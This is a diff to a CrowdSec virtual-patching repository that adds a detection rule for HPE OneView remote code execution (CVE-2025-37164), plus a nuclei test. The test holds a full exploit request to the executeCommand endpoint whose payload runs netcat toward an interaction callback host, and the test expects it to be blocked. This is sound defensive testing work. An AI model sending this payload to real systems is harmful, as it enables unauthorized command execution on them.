diff --git a/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml new file mode 100644 index 00000000000..e7ebb98bc6b --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml @@ -0,0 +1,26 @@ +## autogenerated on 2025-12-29 15:17:08 +id: CVE-2025-37164 +info: + name: CVE-2025-37164 + author: crowdsec + severity: info + description: CVE-2025-37164 testing + tags: appsec-testing +http: + - raw: + - | + PUT /rest/id-pools/executeCommand HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + X-API-Version: 3800 + Accept-Encoding: gzip + + { + "cmd":"nc {{interactsh-url}}", + "result":0 + } + cookie-reuse: true + matchers: + - type: status + status: + - 403 diff --git a/.appsec-tests/vpatch-CVE-2025-37164/config.yaml b/.appsec-tests/vpatch-CVE-2025-37164/config.yaml new file mode 100644 index 00000000000..6aa2a6a1731 --- /dev/null +++ b/.appsec-tests/vpatch-CVE-2025-37164/config.yaml @@ -0,0 +1,5 @@ +## autogenerated on 2025-12-29 15:17:08 +appsec-rules: + - ./appsec-rules/crowdsecurity/base-config.yaml + - ./appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml +nuclei_template: CVE-2025-37164.yaml diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml new file mode 100644 index 00000000000..c16fecec96d --- /dev/null +++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml @@ -0,0 +1,31 @@ +## autogenerated on 2025-12-29 15:17:08 +name: crowdsecurity/vpatch-CVE-2025-37164 +description: 'Detects remote code execution attempts in HPE OneView via executeCommand endpoint.' +rules: + - and: + - zones: + - URI + transform: + - lowercase + match: + type: contains + value: /rest/id-pools/executecommand + - zones: + - RAW_BODY + transform: + - lowercase + match: + type: contains + value: '"cmd":' + +labels: + type: exploit + service: http + confidence: 3 + spoofable: 0 + behavior: 'http:exploit' + label: 'HPE OneView - RCE' + classification: + - cve.CVE-2025-37164 + - attack.T1190 + - cwe.CWE-94 diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml index f5c90e4d535..793ee246046 100644 --- a/collections/crowdsecurity/appsec-virtual-patching.yaml +++ b/collections/crowdsecurity/appsec-virtual-patching.yaml @@ -146,6 +146,7 @@ appsec-rules: - crowdsecurity/vpatch-CVE-2025-9316 - crowdsecurity/vpatch-CVE-2025-11700 - crowdsecurity/vpatch-CVE-2025-13315 +- crowdsecurity/vpatch-CVE-2025-37164 - crowdsecurity/vpatch-CVE-2025-52970 - crowdsecurity/vpatch-CVE-2025-47188 - crowdsecurity/vpatch-CVE-2021-25281